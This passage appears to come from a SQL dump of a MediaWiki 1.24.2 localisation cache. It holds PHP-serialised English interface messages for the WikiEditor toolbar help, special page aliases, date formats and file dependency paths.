extended\";'),('en','messages:wikieditor-toolbar-characters-page-persian','s:7:\"Persian\";'),('en','messages:wikieditor-toolbar-characters-page-hebrew','s:6:\"Hebrew\";'),('en','messages:wikieditor-toolbar-characters-page-bangla','s:6:\"Bangla\";'),('en','messages:wikieditor-toolbar-characters-page-tamil','s:5:\"Tamil\";'),('en','messages:wikieditor-toolbar-characters-page-telugu','s:6:\"Telugu\";'),('en','messages:wikieditor-toolbar-characters-page-sinhala','s:7:\"Sinhala\";'),('en','messages:wikieditor-toolbar-characters-page-gujarati','s:8:\"Gujarati\";'),('en','messages:wikieditor-toolbar-characters-page-devanagari','s:10:\"Devanagari\";'),('en','messages:wikieditor-toolbar-characters-page-thai','s:4:\"Thai\";'),('en','messages:wikieditor-toolbar-characters-page-lao','s:3:\"Lao\";'),('en','messages:wikieditor-toolbar-characters-page-khmer','s:5:\"Khmer\";'),('en','messages:wikieditor-toolbar-characters-endash','s:7:\"en dash\";'),('en','messages:wikieditor-toolbar-characters-emdash','s:7:\"em dash\";'),('en','messages:wikieditor-toolbar-characters-minus','s:10:\"minus sign\";'),('en','messages:wikieditor-toolbar-section-help','s:4:\"Help\";'),('en','messages:wikieditor-toolbar-help-heading-description','s:11:\"Description\";'),('en','messages:wikieditor-toolbar-help-heading-syntax','s:13:\"What you type\";'),('en','messages:wikieditor-toolbar-help-heading-result','s:12:\"What you get\";'),('en','messages:wikieditor-toolbar-help-page-format','s:10:\"Formatting\";'),('en','messages:wikieditor-toolbar-help-page-link','s:5:\"Links\";'),('en','messages:wikieditor-toolbar-help-page-heading','s:8:\"Headings\";'),('en','messages:wikieditor-toolbar-help-page-list','s:5:\"Lists\";'),('en','messages:wikieditor-toolbar-help-page-file','s:5:\"Files\";'),('en','messages:wikieditor-toolbar-help-page-reference','s:10:\"References\";'),('en','messages:wikieditor-toolbar-help-page-discussion','s:10:\"Discussion\";'),('en','messages:wikieditor-toolbar-help-content-italic-description','s:6:\"Italic\";'),('en','messages:wikieditor-toolbar-help-content-italic-syntax','s:15:\"\'\'Italic text\'\'\";'),('en','messages:wikieditor-toolbar-help-content-italic-result','s:20:\"Italic text\";'),('en','messages:wikieditor-toolbar-help-content-bold-description','s:4:\"Bold\";'),('en','messages:wikieditor-toolbar-help-content-bold-syntax','s:15:\"\'\'\'Bold text\'\'\'\";'),('en','messages:wikieditor-toolbar-help-content-bold-result','s:26:\"Bold text\";'),('en','messages:wikieditor-toolbar-help-content-bolditalic-description','s:17:\"Bold & italic\";'),('en','messages:wikieditor-toolbar-help-content-bolditalic-syntax','s:32:\"\'\'\'\'\'Bold & italic text\'\'\'\'\'\";'),('en','messages:wikieditor-toolbar-help-content-bolditalic-result','s:48:\"Bold & italic text\";'),('en','messages:wikieditor-toolbar-help-content-ilink-description','s:13:\"Internal link\";'),('en','messages:wikieditor-toolbar-help-content-ilink-syntax','s:45:\"[[Page title|Link label]]
                                                                [[Page title]]\";'),('en','messages:wikieditor-toolbar-help-content-ilink-result','s:58:\"Link label
                                                                Page title\";'),('en','messages:wikieditor-toolbar-help-content-xlink-description','s:13:\"External link\";'),('en','messages:wikieditor-toolbar-help-content-xlink-syntax','s:93:\"[http://www.example.org Link label]
                                                                [http://www.example.org]
                                                                http://www.example.org\";'),('en','messages:wikieditor-toolbar-help-content-xlink-result','s:157:\"Link label
                                                                [1]
                                                                http://www.example.org\";'),('en','messages:wikieditor-toolbar-help-content-heading2-description','s:17:\"2nd level heading\";'),('en','messages:wikieditor-toolbar-help-content-heading2-syntax','s:18:\"== Heading text ==\";'),('en','messages:wikieditor-toolbar-help-content-heading2-result','s:21:\"

                                                                Heading text

                                                                \";'),('en','messages:wikieditor-toolbar-help-content-heading3-description','s:17:\"3rd level heading\";'),('en','messages:wikieditor-toolbar-help-content-heading3-syntax','s:20:\"=== Heading text ===\";'),('en','messages:wikieditor-toolbar-help-content-heading3-result','s:21:\"

                                                                Heading text

                                                                \";'),('en','messages:wikieditor-toolbar-help-content-heading4-description','s:17:\"4th level heading\";'),('en','messages:wikieditor-toolbar-help-content-heading4-syntax','s:22:\"==== Heading text ====\";'),('en','messages:wikieditor-toolbar-help-content-heading4-result','s:21:\"

                                                                Heading text

                                                                \";'),('en','messages:wikieditor-toolbar-help-content-heading5-description','s:17:\"5th level heading\";'),('en','messages:wikieditor-toolbar-help-content-heading5-syntax','s:24:\"===== Heading text =====\";'),('en','messages:wikieditor-toolbar-help-content-heading5-result','s:21:\"
                                                                Heading text
                                                                \";'),('en','messages:wikieditor-toolbar-help-content-ulist-description','s:13:\"Bulleted list\";'),('en','messages:wikieditor-toolbar-help-content-ulist-syntax','s:28:\"* List item
                                                                * List item\";'),('en','messages:wikieditor-toolbar-help-content-ulist-result','s:45:\"
                                                                • List item
                                                                • List item
                                                                \";'),('en','messages:wikieditor-toolbar-help-content-olist-description','s:13:\"Numbered list\";'),('en','messages:wikieditor-toolbar-help-content-olist-syntax','s:28:\"# List item
                                                                # List item\";'),('en','messages:wikieditor-toolbar-help-content-olist-result','s:45:\"
                                                                1. List item
                                                                2. List item
                                                                \";'),('en','messages:wikieditor-toolbar-help-content-file-description','s:13:\"Embedded file\";'),('en','messages:wikieditor-toolbar-help-content-file-syntax','s:37:\"[[$1:Example.png|thumb|Caption text]]\";'),('en','messages:wikieditor-toolbar-help-content-file-result','s:426:\"
                                                                \'\'/
                                                                \'\'
                                                                Caption text
                                                                \";'),('en','messages:wikieditor-toolbar-help-content-reference-description','s:9:\"Reference\";'),('en','messages:wikieditor-toolbar-help-content-reference-syntax','s:97:\"Page text.<ref name=\"test\">[http://www.example.org Link text], additional text.</ref>\";'),('en','messages:wikieditor-toolbar-help-content-reference-result','s:40:\"Page text.[1]\";'),('en','messages:wikieditor-toolbar-help-content-rereference-description','s:32:\"Additional use of same reference\";'),('en','messages:wikieditor-toolbar-help-content-rereference-syntax','s:25:\"<ref name=\"test\" />\";'),('en','messages:wikieditor-toolbar-help-content-rereference-result','s:40:\"Page text.[1]\";'),('en','messages:wikieditor-toolbar-help-content-showreferences-description','s:18:\"Display references\";'),('en','messages:wikieditor-toolbar-help-content-showreferences-syntax','s:20:\"<references />\";'),('en','messages:wikieditor-toolbar-help-content-showreferences-result','s:204:\"
                                                                1. ^ Link text, additional text.
                                                                \";'),('en','messages:wikieditor-toolbar-help-content-signaturetimestamp-description','s:24:\"Signature with timestamp\";'),('en','messages:wikieditor-toolbar-help-content-signaturetimestamp-syntax','s:4:\"~~~~\";'),('en','messages:wikieditor-toolbar-help-content-signaturetimestamp-result','s:129:\"Username (talk) 15:54, 10 June 2009 (UTC)\";'),('en','messages:wikieditor-toolbar-help-content-signature-description','s:9:\"Signature\";'),('en','messages:wikieditor-toolbar-help-content-signature-syntax','s:3:\"~~~\";'),('en','messages:wikieditor-toolbar-help-content-signature-result','s:103:\"Username (talk)\";'),('en','messages:wikieditor-toolbar-help-content-indent-description','s:6:\"Indent\";'),('en','messages:wikieditor-toolbar-help-content-indent-syntax','s:52:\"Normal text
                                                                :Indented text
                                                                ::Indented text\";'),('en','messages:wikieditor-toolbar-help-content-indent-result','s:73:\"Normal text
                                                                Indented text
                                                                Indented text
                                                                \";'),('en','rtl','b:0;'),('en','capitalizeAllNouns','b:0;'),('en','digitTransformTable','N;'),('en','separatorTransformTable','N;'),('en','fallback8bitEncoding','s:12:\"windows-1252\";'),('en','linkPrefixExtension','b:0;'),('en','linkTrail','s:18:\"/^([a-z]+)(.*)$/sD\";'),('en','linkPrefixCharset','s:23:\"a-zA-Z\\x{80}-\\x{10ffff}\";'),('en','namespaceAliases','a:0:{}'),('en','dateFormats','a:20:{s:8:\"mdy time\";s:3:\"H:i\";s:8:\"mdy date\";s:6:\"F j, Y\";s:13:\"mdy monthonly\";s:3:\"F Y\";s:8:\"mdy both\";s:11:\"H:i, F j, Y\";s:10:\"mdy pretty\";s:3:\"F j\";s:8:\"dmy time\";s:3:\"H:i\";s:8:\"dmy date\";s:5:\"j F Y\";s:13:\"dmy monthonly\";s:3:\"F Y\";s:8:\"dmy both\";s:10:\"H:i, j F Y\";s:10:\"dmy pretty\";s:3:\"j F\";s:8:\"ymd time\";s:3:\"H:i\";s:8:\"ymd date\";s:5:\"Y F j\";s:13:\"ymd monthonly\";s:3:\"Y F\";s:8:\"ymd both\";s:10:\"H:i, Y F j\";s:10:\"ymd pretty\";s:3:\"F j\";s:13:\"ISO 8601 time\";s:11:\"xnH:xni:xns\";s:13:\"ISO 8601 date\";s:11:\"xnY-xnm-xnd\";s:18:\"ISO 8601 monthonly\";s:7:\"xnY-xnm\";s:13:\"ISO 8601 both\";s:25:\"xnY-xnm-xnd\"T\"xnH:xni:xns\";s:15:\"ISO 8601 pretty\";s:7:\"xnm-xnd\";}'),('en','datePreferences','a:5:{i:0;s:7:\"default\";i:1;s:3:\"mdy\";i:2;s:3:\"dmy\";i:3;s:3:\"ymd\";i:4;s:8:\"ISO 8601\";}'),('en','datePreferenceMigrationMap','a:4:{i:0;s:7:\"default\";i:1;s:3:\"mdy\";i:2;s:3:\"dmy\";i:3;s:3:\"ymd\";}'),('en','defaultDateFormat','s:10:\"dmy or mdy\";'),('en','extraUserToggles','a:0:{}'),('en','specialPageAliases','a:110:{s:11:\"Activeusers\";a:1:{i:0;s:11:\"ActiveUsers\";}s:11:\"Allmessages\";a:1:{i:0;s:11:\"AllMessages\";}s:12:\"AllMyUploads\";a:2:{i:0;s:12:\"AllMyUploads\";i:1;s:10:\"AllMyFiles\";}s:8:\"Allpages\";a:1:{i:0;s:8:\"AllPages\";}s:12:\"Ancientpages\";a:1:{i:0;s:12:\"AncientPages\";}s:8:\"Badtitle\";a:1:{i:0;s:8:\"Badtitle\";}s:9:\"Blankpage\";a:1:{i:0;s:9:\"BlankPage\";}s:5:\"Block\";a:3:{i:0;s:5:\"Block\";i:1;s:7:\"BlockIP\";i:2;s:9:\"BlockUser\";}s:11:\"Booksources\";a:1:{i:0;s:11:\"BookSources\";}s:15:\"BrokenRedirects\";a:1:{i:0;s:15:\"BrokenRedirects\";}s:10:\"Categories\";a:1:{i:0;s:10:\"Categories\";}s:11:\"ChangeEmail\";a:1:{i:0;s:11:\"ChangeEmail\";}s:14:\"ChangePassword\";a:3:{i:0;s:14:\"ChangePassword\";i:1;s:9:\"ResetPass\";i:2;s:13:\"ResetPassword\";}s:12:\"ComparePages\";a:1:{i:0;s:12:\"ComparePages\";}s:12:\"Confirmemail\";a:1:{i:0;s:12:\"ConfirmEmail\";}s:13:\"Contributions\";a:2:{i:0;s:13:\"Contributions\";i:1;s:8:\"Contribs\";}s:13:\"CreateAccount\";a:1:{i:0;s:13:\"CreateAccount\";}s:12:\"Deadendpages\";a:1:{i:0;s:12:\"DeadendPages\";}s:20:\"DeletedContributions\";a:1:{i:0;s:20:\"DeletedContributions\";}s:4:\"Diff\";a:1:{i:0;s:4:\"Diff\";}s:15:\"DoubleRedirects\";a:1:{i:0;s:15:\"DoubleRedirects\";}s:13:\"EditWatchlist\";a:1:{i:0;s:13:\"EditWatchlist\";}s:9:\"Emailuser\";a:2:{i:0;s:9:\"EmailUser\";i:1;s:5:\"Email\";}s:15:\"ExpandTemplates\";a:1:{i:0;s:15:\"ExpandTemplates\";}s:6:\"Export\";a:1:{i:0;s:6:\"Export\";}s:15:\"Fewestrevisions\";a:1:{i:0;s:15:\"FewestRevisions\";}s:19:\"FileDuplicateSearch\";a:1:{i:0;s:19:\"FileDuplicateSearch\";}s:8:\"Filepath\";a:1:{i:0;s:8:\"FilePath\";}s:6:\"Import\";a:1:{i:0;s:6:\"Import\";}s:15:\"Invalidateemail\";a:1:{i:0;s:15:\"InvalidateEmail\";}s:14:\"JavaScriptTest\";a:1:{i:0;s:14:\"JavaScriptTest\";}s:9:\"BlockList\";a:3:{i:0;s:9:\"BlockList\";i:1;s:10:\"ListBlocks\";i:2;s:11:\"IPBlockList\";}s:10:\"LinkSearch\";a:1:{i:0;s:10:\"LinkSearch\";}s:10:\"Listadmins\";a:1:{i:0;s:10:\"ListAdmins\";}s:8:\"Listbots\";a:1:{i:0;s:8:\"ListBots\";}s:9:\"Listfiles\";a:3:{i:0;s:9:\"ListFiles\";i:1;s:8:\"FileList\";i:2;s:9:\"ImageList\";}s:15:\"Listgrouprights\";a:2:{i:0;s:15:\"ListGroupRights\";i:1;s:15:\"UserGroupRights\";}s:13:\"Listredirects\";a:1:{i:0;s:13:\"ListRedirects\";}s:19:\"ListDuplicatedFiles\";a:2:{i:0;s:19:\"ListDuplicatedFiles\";i:1;s:18:\"ListFileDuplicates\";}s:9:\"Listusers\";a:2:{i:0;s:9:\"ListUsers\";i:1;s:8:\"UserList\";}s:6:\"Lockdb\";a:1:{i:0;s:6:\"LockDB\";}s:3:\"Log\";a:2:{i:0;s:3:\"Log\";i:1;s:4:\"Logs\";}s:11:\"Lonelypages\";a:2:{i:0;s:11:\"LonelyPages\";i:1;s:13:\"OrphanedPages\";}s:9:\"Longpages\";a:1:{i:0;s:9:\"LongPages\";}s:15:\"MediaStatistics\";a:1:{i:0;s:15:\"MediaStatistics\";}s:12:\"MergeHistory\";a:1:{i:0;s:12:\"MergeHistory\";}s:10:\"MIMEsearch\";a:1:{i:0;s:10:\"MIMESearch\";}s:14:\"Mostcategories\";a:1:{i:0;s:14:\"MostCategories\";}s:10:\"Mostimages\";a:3:{i:0;s:15:\"MostLinkedFiles\";i:1;s:9:\"MostFiles\";i:2;s:10:\"MostImages\";}s:14:\"Mostinterwikis\";a:1:{i:0;s:14:\"MostInterwikis\";}s:10:\"Mostlinked\";a:2:{i:0;s:15:\"MostLinkedPages\";i:1;s:10:\"MostLinked\";}s:20:\"Mostlinkedcategories\";a:2:{i:0;s:20:\"MostLinkedCategories\";i:1;s:18:\"MostUsedCategories\";}s:19:\"Mostlinkedtemplates\";a:3:{i:0;s:20:\"MostTranscludedPages\";i:1;s:19:\"MostLinkedTemplates\";i:2;s:17:\"MostUsedTemplates\";}s:13:\"Mostrevisions\";a:1:{i:0;s:13:\"MostRevisions\";}s:8:\"Movepage\";a:1:{i:0;s:8:\"MovePage\";}s:15:\"Mycontributions\";a:1:{i:0;s:15:\"MyContributions\";}s:10:\"MyLanguage\";a:1:{i:0;s:10:\"MyLanguage\";}s:6:\"Mypage\";a:1:{i:0;s:6:\"MyPage\";}s:6:\"Mytalk\";a:1:{i:0;s:6:\"MyTalk\";}s:9:\"Myuploads\";a:2:{i:0;s:9:\"MyUploads\";i:1;s:7:\"MyFiles\";}s:9:\"Newimages\";a:2:{i:0;s:8:\"NewFiles\";i:1;s:9:\"NewImages\";}s:8:\"Newpages\";a:1:{i:0;s:8:\"NewPages\";}s:13:\"PagesWithProp\";a:4:{i:0;s:13:\"PagesWithProp\";i:1;s:13:\"Pageswithprop\";i:2;s:11:\"PagesByProp\";i:3;s:11:\"Pagesbyprop\";}s:12:\"PageLanguage\";a:1:{i:0;s:12:\"PageLanguage\";}s:13:\"PasswordReset\";a:1:{i:0;s:13:\"PasswordReset\";}s:13:\"PermanentLink\";a:2:{i:0;s:13:\"PermanentLink\";i:1;s:9:\"PermaLink\";}s:12:\"Popularpages\";a:1:{i:0;s:12:\"PopularPages\";}s:11:\"Preferences\";a:1:{i:0;s:11:\"Preferences\";}s:11:\"Prefixindex\";a:1:{i:0;s:11:\"PrefixIndex\";}s:14:\"Protectedpages\";a:1:{i:0;s:14:\"ProtectedPages\";}s:15:\"Protectedtitles\";a:1:{i:0;s:15:\"ProtectedTitles\";}s:10:\"Randompage\";a:2:{i:0;s:6:\"Random\";i:1;s:10:\"RandomPage\";}s:16:\"RandomInCategory\";a:1:{i:0;s:16:\"RandomInCategory\";}s:14:\"Randomredirect\";a:1:{i:0;s:14:\"RandomRedirect\";}s:13:\"Recentchanges\";a:1:{i:0;s:13:\"RecentChanges\";}s:19:\"Recentchangeslinked\";a:2:{i:0;s:19:\"RecentChangesLinked\";i:1;s:14:\"RelatedChanges\";}s:8:\"Redirect\";a:1:{i:0;s:8:\"Redirect\";}s:11:\"ResetTokens\";a:1:{i:0;s:11:\"ResetTokens\";}s:14:\"Revisiondelete\";a:1:{i:0;s:14:\"RevisionDelete\";}s:7:\"RunJobs\";a:1:{i:0;s:7:\"RunJobs\";}s:6:\"Search\";a:1:{i:0;s:6:\"Search\";}s:10:\"Shortpages\";a:1:{i:0;s:10:\"ShortPages\";}s:12:\"Specialpages\";a:1:{i:0;s:12:\"SpecialPages\";}s:10:\"Statistics\";a:1:{i:0;s:10:\"Statistics\";}s:4:\"Tags\";a:1:{i:0;s:4:\"Tags\";}s:18:\"TrackingCategories\";a:1:{i:0;s:18:\"TrackingCategories\";}s:7:\"Unblock\";a:1:{i:0;s:7:\"Unblock\";}s:23:\"Uncategorizedcategories\";a:1:{i:0;s:23:\"UncategorizedCategories\";}s:19:\"Uncategorizedimages\";a:2:{i:0;s:18:\"UncategorizedFiles\";i:1;s:19:\"UncategorizedImages\";}s:18:\"Uncategorizedpages\";a:1:{i:0;s:18:\"UncategorizedPages\";}s:22:\"Uncategorizedtemplates\";a:1:{i:0;s:22:\"UncategorizedTemplates\";}s:8:\"Undelete\";a:1:{i:0;s:8:\"Undelete\";}s:8:\"Unlockdb\";a:1:{i:0;s:8:\"UnlockDB\";}s:16:\"Unusedcategories\";a:1:{i:0;s:16:\"UnusedCategories\";}s:12:\"Unusedimages\";a:2:{i:0;s:11:\"UnusedFiles\";i:1;s:12:\"UnusedImages\";}s:15:\"Unusedtemplates\";a:1:{i:0;s:15:\"UnusedTemplates\";}s:14:\"Unwatchedpages\";a:1:{i:0;s:14:\"UnwatchedPages\";}s:6:\"Upload\";a:1:{i:0;s:6:\"Upload\";}s:11:\"UploadStash\";a:1:{i:0;s:11:\"UploadStash\";}s:9:\"Userlogin\";a:2:{i:0;s:9:\"UserLogin\";i:1;s:5:\"Login\";}s:10:\"Userlogout\";a:2:{i:0;s:10:\"UserLogout\";i:1;s:6:\"Logout\";}s:10:\"Userrights\";a:3:{i:0;s:10:\"UserRights\";i:1;s:9:\"MakeSysop\";i:2;s:7:\"MakeBot\";}s:7:\"Version\";a:1:{i:0;s:7:\"Version\";}s:16:\"Wantedcategories\";a:1:{i:0;s:16:\"WantedCategories\";}s:11:\"Wantedfiles\";a:1:{i:0;s:11:\"WantedFiles\";}s:11:\"Wantedpages\";a:2:{i:0;s:11:\"WantedPages\";i:1;s:11:\"BrokenLinks\";}s:15:\"Wantedtemplates\";a:1:{i:0;s:15:\"WantedTemplates\";}s:9:\"Watchlist\";a:1:{i:0;s:9:\"Watchlist\";}s:13:\"Whatlinkshere\";a:1:{i:0;s:13:\"WhatLinksHere\";}s:16:\"Withoutinterwiki\";a:1:{i:0;s:16:\"WithoutInterwiki\";}}'),('en','imageFiles','a:10:{s:11:\"button-bold\";s:18:\"en/button_bold.png\";s:13:\"button-italic\";s:20:\"en/button_italic.png\";s:11:\"button-link\";s:18:\"en/button_link.png\";s:14:\"button-extlink\";s:21:\"en/button_extlink.png\";s:15:\"button-headline\";s:22:\"en/button_headline.png\";s:12:\"button-image\";s:19:\"en/button_image.png\";s:12:\"button-media\";s:19:\"en/button_media.png\";s:13:\"button-nowiki\";s:20:\"en/button_nowiki.png\";s:10:\"button-sig\";s:17:\"en/button_sig.png\";s:9:\"button-hr\";s:16:\"en/button_hr.png\";}'),('en','preloadedMessages','a:104:{i:0;s:9:\"aboutpage\";i:1;s:9:\"aboutsite\";i:2;s:17:\"accesskey-ca-edit\";i:3;s:20:\"accesskey-ca-history\";i:4;s:23:\"accesskey-ca-nstab-main\";i:5;s:17:\"accesskey-ca-talk\";i:6;s:17:\"accesskey-ca-view\";i:7;s:25:\"accesskey-n-currentevents\";i:8;s:16:\"accesskey-n-help\";i:9;s:32:\"accesskey-n-mainpage-description\";i:10;s:18:\"accesskey-n-portal\";i:11;s:22:\"accesskey-n-randompage\";i:12;s:25:\"accesskey-n-recentchanges\";i:13;s:16:\"accesskey-p-logo\";i:14;s:18:\"accesskey-pt-login\";i:15;s:16:\"accesskey-search\";i:16;s:25:\"accesskey-search-fulltext\";i:17;s:19:\"accesskey-search-go\";i:18;s:21:\"accesskey-t-permalink\";i:19;s:31:\"accesskey-t-recentchangeslinked\";i:20;s:24:\"accesskey-t-specialpages\";i:21;s:25:\"accesskey-t-whatlinkshere\";i:22;s:7:\"actions\";i:23;s:10:\"anonnotice\";i:24;s:13:\"currentevents\";i:25;s:17:\"currentevents-url\";i:26;s:14:\"disclaimerpage\";i:27;s:11:\"disclaimers\";i:28;s:4:\"edit\";i:29;s:11:\"editsection\";i:30;s:15:\"editsectionhint\";i:31;s:4:\"help\";i:32;s:8:\"helppage\";i:33;s:24:\"interlanguage-link-title\";i:34;s:6:\"jumpto\";i:35;s:16:\"jumptonavigation\";i:36;s:12:\"jumptosearch\";i:37;s:14:\"lastmodifiedat\";i:38;s:8:\"mainpage\";i:39;s:20:\"mainpage-description\";i:40;s:14:\"mainpage-nstab\";i:41;s:10:\"namespaces\";i:42;s:10:\"navigation\";i:43;s:23:\"nav-login-createaccount\";i:44;s:10:\"nstab-main\";i:45;s:10:\"nstab-talk\";i:46;s:15:\"opensearch-desc\";i:47;s:14:\"pagecategories\";i:48;s:18:\"pagecategorieslink\";i:49;s:9:\"pagetitle\";i:50;s:23:\"pagetitle-view-mainpage\";i:51;s:9:\"permalink\";i:52;s:13:\"personaltools\";i:53;s:6:\"portal\";i:54;s:10:\"portal-url\";i:55;s:16:\"printableversion\";i:56;s:7:\"privacy\";i:57;s:11:\"privacypage\";i:58;s:10:\"randompage\";i:59;s:14:\"randompage-url\";i:60;s:13:\"recentchanges\";i:61;s:27:\"recentchangeslinked-toolbox\";i:62;s:17:\"recentchanges-url\";i:63;s:13:\"retrievedfrom\";i:64;s:6:\"search\";i:65;s:13:\"searcharticle\";i:66;s:12:\"searchbutton\";i:67;s:7:\"sidebar\";i:68;s:18:\"navigation-heading\";i:69;s:14:\"site-atom-feed\";i:70;s:10:\"sitenotice\";i:71;s:12:\"specialpages\";i:72;s:7:\"tagline\";i:73;s:4:\"talk\";i:74;s:7:\"toolbox\";i:75;s:15:\"tooltip-ca-edit\";i:76;s:18:\"tooltip-ca-history\";i:77;s:21:\"tooltip-ca-nstab-main\";i:78;s:15:\"tooltip-ca-talk\";i:79;s:15:\"tooltip-ca-view\";i:80;s:23:\"tooltip-n-currentevents\";i:81;s:14:\"tooltip-n-help\";i:82;s:30:\"tooltip-n-mainpage-description\";i:83;s:16:\"tooltip-n-portal\";i:84;s:20:\"tooltip-n-randompage\";i:85;s:23:\"tooltip-n-recentchanges\";i:86;s:14:\"tooltip-p-logo\";i:87;s:20:\"tooltip-p-navigation\";i:88;s:12:\"tooltip-p-tb\";i:89;s:16:\"tooltip-pt-login\";i:90;s:14:\"tooltip-search\";i:91;s:23:\"tooltip-search-fulltext\";i:92;s:17:\"tooltip-search-go\";i:93;s:19:\"tooltip-t-permalink\";i:94;s:29:\"tooltip-t-recentchangeslinked\";i:95;s:22:\"tooltip-t-specialpages\";i:96;s:23:\"tooltip-t-whatlinkshere\";i:97;s:8:\"variants\";i:98;s:16:\"vector-view-edit\";i:99;s:19:\"vector-view-history\";i:100;s:16:\"vector-view-view\";i:101;s:9:\"viewcount\";i:102;s:5:\"views\";i:103;s:13:\"whatlinkshere\";}'),('en','namespaceGenderAliases','a:0:{}'),('en','digitGroupingPattern','N;'),('en','pluralRules','a:1:{i:0;s:26:\"i = 1 and v = 0 @integer 1\";}'),('en','pluralRuleTypes','a:1:{i:0;s:3:\"one\";}'),('en','compiledPluralRules','a:1:{i:0;s:17:\"i 1 in v 0 in and\";}'),('en','fallbackSequence','a:0:{}'),('en','deps','a:13:{i:0;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:59:\"/var/www/mediawiki-1.24.2/languages/messages/MessagesEn.php\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}s:7:\"plurals\";O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:52:\"/var/www/mediawiki-1.24.2/languages/data/plurals.xml\";s:25:\"\0FileDependency\0timestamp\";i:1427827534;}s:10:\"plurals-mw\";O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:62:\"/var/www/mediawiki-1.24.2/languages/data/plurals-mediawiki.xml\";s:25:\"\0FileDependency\0timestamp\";i:1427827534;}i:1;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:48:\"/var/www/mediawiki-1.24.2/languages/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}i:2;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:60:\"/var/www/mediawiki-1.24.2/resources/lib/oojs-ui/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}i:3;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:56:\"/var/www/mediawiki-1.24.2/skins/CologneBlue/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:4;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:51:\"/var/www/mediawiki-1.24.2/skins/Modern/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:5;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:53:\"/var/www/mediawiki-1.24.2/skins/MonoBook/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:6;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:51:\"/var/www/mediawiki-1.24.2/skins/Vector/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:7;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:60:\"/var/www/mediawiki-1.24.2/extensions/WikiEditor/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827537;}s:24:\"wgExtensionMessagesFiles\";O:16:\"GlobalDependency\":2:{s:22:\"\0GlobalDependency\0name\";s:24:\"wgExtensionMessagesFiles\";s:23:\"\0GlobalDependency\0value\";a:1:{s:10:\"WikiEditor\";s:67:\"/var/www/mediawiki-1.24.2/extensions/WikiEditor/WikiEditor.i18n.php\";}}s:14:\"wgMessagesDirs\";O:16:\"GlobalDependency\":2:{s:22:\"\0GlobalDependency\0name\";s:14:\"wgMessagesDirs\";s:23:\"\0GlobalDependency\0value\";a:7:{s:4:\"core\";s:40:\"/var/www/mediawiki-1.24.2/languages/i18n\";s:7:\"oojs-ui\";s:52:\"/var/www/mediawiki-1.24.2/resources/lib/oojs-ui/i18n\";s:11:\"CologneBlue\";s:48:\"/var/www/mediawiki-1.24.2/skins/CologneBlue/i18n\";s:6:\"Modern\";s:43:\"/var/www/mediawiki-1.24.2/skins/Modern/i18n\";s:8:\"MonoBook\";s:45:\"/var/www/mediawiki-1.24.2/skins/MonoBook/i18n\";s:6:\"Vector\";s:43:\"/var/www/mediawiki-1.24.2/skins/Vector/i18n\";s:10:\"WikiEditor\";s:52:\"/var/www/mediawiki-1.24.2/extensions/WikiEditor/i18n\";}}s:7:\"version\";O:18:\"ConstantDependency\":2:{s:24:\"\0ConstantDependency\0name\";s:26:\"LocalisationCache::VERSION\";s:25:\"\0ConstantDependency\0value\";i:2;}}'),('en','list','a:1:{s:8:\"messages\";a:3837:{i:0;s:7:\"sidebar\";i:1;s:13:\"tog-underline\";i:2;s:13:\"tog-hideminor\";i:3;s:17:\"tog-hidepatrolled\";i:4;s:25:\"tog-newpageshidepatrolled\";i:5;s:19:\"tog-extendwatchlist\";i:6;s:12:\"tog-usenewrc\";i:7;s:18:\"tog-numberheadings\";i:8;s:15:\"tog-showtoolbar\";i:9;s:18:\"tog-editondblclick\";i:10;s:27:\"tog-editsectiononrightclick\";i:11;s:18:\"tog-watchcreations\";i:12;s:16:\"tog-watchdefault\";i:13;s:14:\"tog-watchmoves\";i:14;s:17:\"tog-watchdeletion\";i:15;s:17:\"tog-watchrollback\";i:16;s:16:\"tog-minordefault\";i:17;s:16:\"tog-previewontop\";i:18;s:18:\"tog-previewonfirst\";i:19;s:24:\"tog-enotifwatchlistpages\";i:20;s:23:\"tog-enotifusertalkpages\";i:21;s:20:\"tog-enotifminoredits\";i:22;s:20:\"tog-enotifrevealaddr\";i:23;s:23:\"tog-shownumberswatching\";i:24;s:10:\"tog-oldsig\";i:25;s:12:\"tog-fancysig\";i:26;s:18:\"tog-uselivepreview\";i:27;s:20:\"tog-forceeditsummary\";i:28;s:20:\"tog-watchlisthideown\";i:29;s:21:\"tog-watchlisthidebots\";i:30;s:22:\"tog-watchlisthideminor\";i:31;s:20:\"tog-watchlisthideliu\";i:32;s:22:\"tog-watchlisthideanons\";i:33;s:26:\"tog-watchlisthidepatrolled\";i:34;s:16:\"tog-ccmeonemails\";i:35;s:12:\"tog-diffonly\";i:36;s:18:\"tog-showhiddencats\";i:37;s:18:\"tog-norollbackdiff\";i:38;s:18:\"tog-useeditwarning\";i:39;s:16:\"tog-prefershttps\";i:40;s:16:\"underline-always\";i:41;s:15:\"underline-never\";i:42;s:17:\"underline-default\";i:43;s:14:\"editfont-style\";i:44;s:16:\"editfont-default\";i:45;s:18:\"editfont-monospace\";i:46;s:18:\"editfont-sansserif\";i:47;s:14:\"editfont-serif\";i:48;s:6:\"sunday\";i:49;s:6:\"monday\";i:50;s:7:\"tuesday\";i:51;s:9:\"wednesday\";i:52;s:8:\"thursday\";i:53;s:6:\"friday\";i:54;s:8:\"saturday\";i:55;s:3:\"sun\";i:56;s:3:\"mon\";i:57;s:3:\"tue\";i:58;s:3:\"wed\";i:59;s:3:\"thu\";i:60;s:3:\"fri\";i:61;s:3:\"sat\";i:62;s:7:\"january\";i:63;s:8:\"february\";i:64;s: